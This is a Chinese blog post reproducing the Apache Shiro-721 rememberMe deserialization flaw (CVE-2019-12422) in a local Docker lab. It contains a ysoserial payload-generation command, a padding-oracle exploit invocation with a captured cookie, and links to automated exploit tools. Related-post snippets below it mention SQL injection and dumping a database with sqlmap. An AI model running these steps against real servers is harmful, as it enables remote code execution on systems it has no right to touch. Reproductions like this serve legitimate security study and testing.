首页 > 其他分享 >shiro-721 CVE-2019-12422

shiro-721 CVE-2019-12422

时间:2023-09-21 16:34:47浏览次数:31  
标签:ysoserial 12422 2019 Shiro 721 CVE com payload shiro

漏洞描述
Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞

影响版本
Apache Shiro < 1.4.2
环境搭建
下载
git clone https://github.com/3ndz/Shiro-721.git
cd Shiro-721/Docker

构建、运行
docker build -t shiro-721 .    //不要忽略721后面的那个点,意为当前路径
docker run -p 8080:8080 -d shiro-721

复现过程

选择正确登录,并勾选Remember Me
登录后点击account页面,获取rememberMe的值

 

使用ysoserial生成payload
java -jar ysoserial-master.jar CommonsBeanutils1 "touch /tmp/succ123" > payload.class

使用公开exp破解payload的密文
python2 shiro_exp.py  http://0.0.0.0:8080/account/ ksothlyg7KC4Ao/2liRPGUt9AoR1xFrK6WOje7cGFoW5Qz/KQNNucDBmfyznZqI60evUrCCAQMXYlS1TO4/i/J8W8G92OJ4s1rqU9uahWUladtSt5f3Xei1uEE19snJbKeNDqj/OEQLCzTnRef8ZQbRbyExu3jfg3rabpfvRTtC+XA59/pHcwuI8td9oe+8O8pCYkA6T+3lZET/Q6nUH9N3KNoQeSSG/e/4hSDVtSOar42HBMMxaVCWx9lOdiSQLXQJxNCLbjUOWDA2dZ1Vol0QsXGp+g13dZkMDQeZUUJvlpO9zCvPjvdcMpXlS8n/Ovx7XNITyXKz47W+Nt0+01ywcgAw5q+8ntYBicWmKVy1BQouSnTRQis3sf+ktLZubfiDYgjbh7uR0aXPZtY3IZ4fdQby4+AGXuUHxjT9J3eCSz+Iotbv9A1UElswaLON1o3RwLAy6IQ5Cgh3XyBTxVuhV714gWLTCmxEPU0dGqvq9MJOvV2Ogn03eJ1KYDXBB payload.class

此步骤很慢,可以将远程指令设置短一些
下载连接一:https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
下载链接二:https://github.com/wuppp/shiro_rce_exp
将的得到的值替换就可成功

工具利用

Shiro-550,只需输入url,即可完成自动化检测和漏洞利用,不能使用可能是环境不兼容
https://github.com/feihong-cs/ShiroExploit

 

 

 

标签:ysoserial,12422,2019,Shiro,721,CVE,com,payload,shiro
From: https://www.cnblogs.com/Bin-go/p/17720263.html

相关文章

  • 春秋云镜 - CVE-2022-32991
    靶标介绍:该CMS的welcome.php中存在SQL注入攻击。访问页面,先注册,使用邮箱加密码登录。bp抓包,后台挂上sqlipy然后去测welcome.php,常用的语句都没成功但过一会就有了结果,注入点在eid这个参数,看payload是bool盲注。直接sqlmap一把梭,脱裤。sqlmap-rsql.txt--dbs--batch......
  • 2019, XII Samara Regional Intercollegiate Programming Contest
    \(ProblemA.RoomsandPassages\)倒着处理每个位置正数的最前部的位置。如果是正数,显然答案为后一个位置的答案\(+1\)。如果是负数且前面出现过相应的正数,答案要对这个区间长度\(-1\)的取\(min\)。voidsolve(){intn=read();vector<int>a(n+2),cnt(n+2,-1)......
  • Redis漏洞总结--未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022
    Redis未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)环境复现采用Vulfocus靶场进行环境复现,官网docker搭建有问题,具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败CNVD-2015-07557未授权访问影响版本Redis<=5.0.5漏洞探测使用端......
  • 揭秘ES2019令人兴奋的语言特性
    大家好!我是星辰编程理财。今天我分享一篇关于ES2019(ES10)的文章,它将介绍ES2019的语言特性和功能,包括Array.prototype.flat、Promise.prototype.finally()、BigInt、Object.fromEntries()、Dynamicimport()函数等等。通过我的视角以及详细的阐述和示例,带领大家一起探索这些特性的用......
  • 揭秘ES2019令人兴奋的语言特性
    大家好!我是星辰编程理财。今天我分享一篇关于ES2019(ES10)的文章,它将介绍ES2019的语言特性和功能,包括Array.prototype.flat、Promise.prototype.finally()、BigInt、Object.fromEntries()、Dynamicimport()函数等等。通过我的视角以及详细的阐述和示例,带领大家一起探索这些特性的用......
  • 2018-2019 ACM-ICPC Brazil Subregional Programming Contest
    \(B.Marbles\)如果是\(Nim\)博弈,题目应该改成到转移所有石子。显然要转化到将所有石子转移到\((1,2)\)或者\((2,1)\),特判无需到达这两个点的必败态,对其他点使用\(Nim\)博弈判断胜负态。intsg[N][N],vis[N];voidinit(){for(inti=1;i<=100;i++){for(in......
  • 「2019 集训队互测 Day 3」操作序列计数 题解
    简化题意:对于每一个$L$,求出有多少个长度为$L+1$的非负整数序列$a$,满足$\sum_{i=0}^{L}a_ik^i\leqn$,并且$a_{L}>0$。我们注意题目要求的和是小于等于一个数,这不太方便。我们可以把它转化成和等于一个数的形式,其实就是和为$nk$的方案数,这就相当于在最后的和后面乘上一......
  • Exchange 2019 服务器实战化操作-- 6. Outlook 邮件彻底删除之后的恢复
    ==回顾:==上篇文章我们介绍了如何配置Exchangeserver2019的电子数据展示和保留,该功能将有助于企业合规部门对于用户邮件的审查和诉讼保留,今天我们要学习的对象同样也是Exchange非常重要而且很实用的一个功能:SingleItemRecovery,也就是说邮件在客户端删除后的恢复,如果已删除项......
  • Spring Framework RCE CVE-2022-22965 漏洞分析
    摘要本文会从几个角度分析漏洞CVE-2022-22965,首先会从payload的构造。每次我都喜欢先分析漏洞的payload,不得不承认实力没达到可以直接分析漏洞地步。所以会先看看payload的构造过程看看,每次学习和分析漏洞的payload能学到很多有趣的角度和想法。从payload的构造分析,分析payload的......
  • 【漏洞复现】Openfire身份认证绕过漏洞到RCE(CVE-2023-32315)
    1、简介Openfire是一个基于XMPP协议的即时通讯服务器,也称之为即时通讯平台。在即时通讯中往往因为需要保存一些状态或者数据所以不能采用点对点通讯,而是需要搭建服务器来转发。Openfire的管理页面包含5个菜单选项,分别是服务器基本信息配置选项、用户组管理选项、会话管理选项、分......